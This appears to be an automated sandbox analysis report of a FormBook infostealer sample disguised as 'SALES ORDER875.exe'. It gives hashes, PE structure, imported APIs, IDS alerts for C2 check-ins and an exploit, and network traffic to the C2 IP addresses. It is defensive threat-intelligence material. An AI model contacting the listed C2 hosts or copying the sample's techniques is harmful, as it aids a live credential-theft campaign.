                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 199.59.243.227
                                                                                                                                                                                  No context
                                                                                                                                                                                  No context
                                                                                                                                                                                  Process:C:\Users\user\Desktop\SALES ORDER875.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):189440
                                                                                                                                                                                  Entropy (8bit):7.8380796830184165
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:6HK9oP36tyB28poN3tZyJ/EfZVz7bN9Dwhg2Ywc/oe1a0V0OaTJ1Ck1lkW8qpRnm:67qY28lJ/WV3NSgd58J/lV8ID10h
                                                                                                                                                                                  MD5:9BC54AB9410B586B68EDDBA852C637CC
                                                                                                                                                                                  SHA1:FC696BCD08A2A4BA1CA9BA906B3E1C859CB7B48A
                                                                                                                                                                                  SHA-256:03B8B21588D8040D3DBF8F35045A3E79CD8CFB8FC3FE48AC2ABB5B490CCDC557
                                                                                                                                                                                  SHA-512:1D667CF24784FAE219EBFB204D985FC8E7395295D10F2F059740E5A303D4B39C5218692C9225F85909B3AD0809B3EF56AF527F581E4C69BC275F6FEC945F8A17
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:..u..7A0T...8......V3...i3\...1M4V59BV0BR7A0TNZ51M4V59BV0BR7.0TNT*.C4.<.c.1....X==zEC"S$TTb5Q,<X5.6+zGD#.?[...cb?X%UzCW?.M4V59BV..Z..2...W...S..V....'..N....R..9....4..Y7&..W.4V59BV0BR7A0TNZ5a.4Vy8CV.;fA0TNZ51M.V78IW:BR.C0TNZ51M4VE.CV0RR7A.VNZ5qM4F59BT0BW7@0TNZ54M5V59BV0.P7A2TNZ51M6Vu.BV BR'A0TNJ51]4V59BV BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0z:?MEM4V..@V0RR7A.VNZ%1M4V59BV0BR7A0tNZU1M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TN
                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.27582303400322
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:SALES ORDER875.exe
                                                                                                                                                                                  File size:1'396'736 bytes
                                                                                                                                                                                  MD5:6ac24df0d8b58005679910e42981dbe8
                                                                                                                                                                                  SHA1:e421e5241a965e8714d3506dfb0aabc06ee52603
                                                                                                                                                                                  SHA256:eb00047a6b0c3483760d36fc53b69398768f28532003f44d0b402052f65bbd24
                                                                                                                                                                                  SHA512:6181b4ef3b6850c3fb60bfab6637e0fe80fd13fd14e2c56c8fd4cb25f633950d5c38262566ec3a77563a0aa17c4e5ffee78fe6962992175a5938a275c5488259
                                                                                                                                                                                  SSDEEP:24576:MqDEvCTbMWu7rQYlBQcBiT6rprG8a8tqTr5mBln/sKG4K5nwqsPGAAJBl7:MTvC/MTQYxsWR7a8tqhmDn64K5sAV
                                                                                                                                                                                  TLSH:B855D00273C1D062FF9B92334B5AF6515BBC6A260123E61F13981D7ABE701B1563E7A3
                                                                                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                                                                                                  Entrypoint:0x420577
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x672420CF [Fri Nov 1 00:29:03 2024 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                                                                                                  Instruction
                                                                                                                                                                                  call 00007FC62882BCF3h
                                                                                                                                                                                  jmp 00007FC62882B5FFh
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                  call 00007FC62882B7DDh
                                                                                                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                  pop esi
                                                                                                                                                                                  pop ebp
                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                                                                                                  ret
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                  call 00007FC62882B7AAh
                                                                                                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                  pop esi
                                                                                                                                                                                  pop ebp
                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                                                                                                  ret
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  push esi
                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                                                                                  and dword ptr [eax], 00000000h
                                                                                                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                  add eax, 04h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007FC62882E39Dh
                                                                                                                                                                                  pop ecx
                                                                                                                                                                                  pop ecx
                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                  pop esi
                                                                                                                                                                                  pop ebp
                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007FC62882E3E8h
                                                                                                                                                                                  pop ecx
                                                                                                                                                                                  ret
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  push esi
                                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007FC62882E3D1h
                                                                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                  pop ecx
                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x7e558.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1530000x7594.reloc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0xd40000x7e5580x7e600aab91196a818d85026b1eef86242a428False0.9496572854846687data7.940026149060241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .reloc0x1530000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                  RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                                                  RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                                                  RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                                  RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                                                  RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                                                  RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                                                  RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                                                  RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                                                  RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                                  RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                                                                                  RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                                  RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                  RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                  RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                                  RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                                  RT_RCDATA0xdc4100x75bf0data1.0003234581826626
                                                                                                                                                                                  RT_GROUP_ICON0x1520000x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                                  RT_GROUP_ICON0x1520780x14dataEnglishGreat Britain1.15
                                                                                                                                                                                  RT_VERSION0x15208c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                                  RT_MANIFEST0x1521680x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  EnglishGreat Britain
                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-11-01T14:07:13.604938+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449730TCP
                                                                                                                                                                                  2024-11-01T14:07:52.286999+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449736TCP
                                                                                                                                                                                  2024-11-01T14:09:11.722171+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450002199.59.243.22780TCP
                                                                                                                                                                                  2024-11-01T14:09:11.722171+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450002199.59.243.22780TCP
                                                                                                                                                                                  2024-11-01T14:09:11.722171+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450002199.59.243.22780TCP
                                                                                                                                                                                  2024-11-01T14:09:32.405646+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450003216.239.32.5280TCP
                                                                                                                                                                                  2024-11-01T14:09:32.405646+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450003216.239.32.5280TCP
                                                                                                                                                                                  2024-11-01T14:09:32.405646+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450003216.239.32.5280TCP
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 1, 2024 14:09:11.194890022 CET5000280192.168.2.4199.59.243.227
                                                                                                                                                                                  Nov 1, 2024 14:09:11.200602055 CET8050002199.59.243.227192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:11.200701952 CET5000280192.168.2.4199.59.243.227
                                                                                                                                                                                  Nov 1, 2024 14:09:11.200793028 CET5000280192.168.2.4199.59.243.227
                                                                                                                                                                                  Nov 1, 2024 14:09:11.205660105 CET8050002199.59.243.227192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:11.714071989 CET5000280192.168.2.4199.59.243.227
                                                                                                                                                                                  Nov 1, 2024 14:09:11.719969034 CET8050002199.59.243.227192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:11.722171068 CET5000280192.168.2.4199.59.243.227
                                                                                                                                                                                  Nov 1, 2024 14:09:31.892076015 CET5000380192.168.2.4216.239.32.52
                                                                                                                                                                                  Nov 1, 2024 14:09:31.898422003 CET8050003216.239.32.52192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:31.898654938 CET5000380192.168.2.4216.239.32.52
                                                                                                                                                                                  Nov 1, 2024 14:09:31.898746014 CET5000380192.168.2.4216.239.32.52
                                                                                                                                                                                  Nov 1, 2024 14:09:31.905217886 CET8050003216.239.32.52192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:32.399243116 CET5000380192.168.2.4216.239.32.52
                                                                                                                                                                                  Nov 1, 2024 14:09:32.405529976 CET8050003216.239.32.52192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:32.405646086 CET5000380192.168.2.4216.239.32.52
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 1, 2024 14:07:48.181421041 CET6380253192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:07:48.193178892 CET53638021.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:08:09.571980000 CET6356453192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:08:09.660111904 CET53635641.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:08:28.602884054 CET4942053192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:08:28.613985062 CET53494201.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:08:49.446813107 CET5427453192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:08:49.455573082 CET53542741.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:10.967401981 CET6203553192.168.2.41.1.1.1
                                                                                                                                                                                  Nov 1, 2024 14:09:11.169971943 CET53620351.1.1.1192.168.2.4
                                                                                                                                                                                  Nov 1, 2024 14:09:31.856239080 CET6053053192.168.2.41.1.1.1
